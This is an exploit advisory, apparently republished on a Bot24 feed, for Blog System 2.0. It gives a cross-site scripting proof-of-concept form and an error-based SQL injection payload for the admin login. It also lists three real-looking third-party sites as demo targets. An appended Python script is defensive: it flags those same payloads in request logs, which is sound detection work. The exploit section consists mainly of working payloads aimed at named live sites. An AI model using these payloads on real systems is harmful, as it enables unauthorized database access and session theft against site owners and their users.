Channel: BOT24

Blog System 2.0 XSS/SQLi Vulnerability


##########################################
# Exploit Title: Blog System 2.0 XSS/SQL Injection Vulnerability
# Date: 2013-02-27
# Author: DaOne aka Mocking Bird
# Software Link: http://www.netartmedia.net/blogsystem/
# Category: webapps/php
# Version: 2.0
##########################################

[#] Cross Site Scripting
An attacker can inject JavaScript in the [title or html] fields.
PoC:
<form  action="http://site.com/BLOGSADMIN/index.php" method="post">
<input type=hidden name=category value="home">
<input type=hidden name=action value="welcome">
<input type=hidden name=SpecialProcessAddForm>
<input type=text name="title" value="<script>alert(document.cookie)</script>">
<input name="html" value="<script>alert(document.cookie)</script>">
<input type=submit value="submit"></form>


[#] SQL Injection
-Exploit-
http://site.com/BLOGSADMIN/loginaction.php
Request Data:
Email='%2B(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)%2B'&Password=123

-Demo-
http://blogsever.com/BLOGSADMIN/loginaction.php
http://www.mypublishingbook.com/BLOGSADMIN/loginaction.php
http://www.gamr15.com/BLOGSADMIN/loginaction.php
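
A defensive check for the two issues above, as an added example that is not part of the original advisory: it parses POST bodies sent to the two endpoints named in the PoCs and flags an `Email` value that is not a plain address, and `title`/`html` values carrying script markup. The sample request bodies are constructed, and the function names and regular expressions are assumptions chosen for log review; they do not replace parameterized queries and output encoding in the application.

```python
import re
from urllib.parse import parse_qs

# Constructed sample requests (path, urlencoded POST body); not captured traffic.
SAMPLES = [
    ("/BLOGSADMIN/loginaction.php", "Email=alice%40example.com&Password=hunter2"),
    ("/BLOGSADMIN/loginaction.php",
     "Email='%2B(select 1 FROM(select count(*),concat((select database()),"
     "floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)%2B'"
     "&Password=123"),
    ("/BLOGSADMIN/index.php",
     "category=home&action=welcome"
     "&title=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&html=hi"),
    ("/BLOGSADMIN/index.php",
     "category=home&action=welcome&title=Hello&html=%3Cp%3Ehi%3C%2Fp%3E"),
]

# Allow-list: a login Email should look like an address and nothing else.
EMAIL_OK = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
# Tokens typical of subquery / error-based injection in a login field.
SQL_TOKENS = re.compile(
    r"(?i)\bselect\b|\bunion\b|information_schema|\bgroup\s+by\b|rand\s*\(")
# Script tags, inline event handlers inside a tag, javascript: URLs.
SCRIPT = re.compile(r"(?i)<\s*script\b|<[^>]*\bon\w+\s*=|javascript:")


def inspect(path, body):
    """Return a list of findings for one POST request."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    findings = []
    if path.endswith("/loginaction.php"):
        email = params.get("Email", "")
        if not EMAIL_OK.match(email):
            kind = "sqli" if SQL_TOKENS.search(email) else "malformed"
            findings.append(kind + ":Email")
    if path.endswith("/index.php"):
        for field in ("title", "html"):
            if SCRIPT.search(params.get(field, "")):
                findings.append("xss:" + field)
    return findings


def scan(samples=SAMPLES):
    """Inspect every sample request and return the findings per request."""
    return [inspect(path, body) for path, body in samples]


if __name__ == "__main__":
    for (path, _), found in zip(SAMPLES, scan()):
        print(path, found or "clean")
```

The `html` field is expected to hold markup, so the check flags script-bearing markup there rather than every tag.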


Greets to: All TGT Members..




//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.

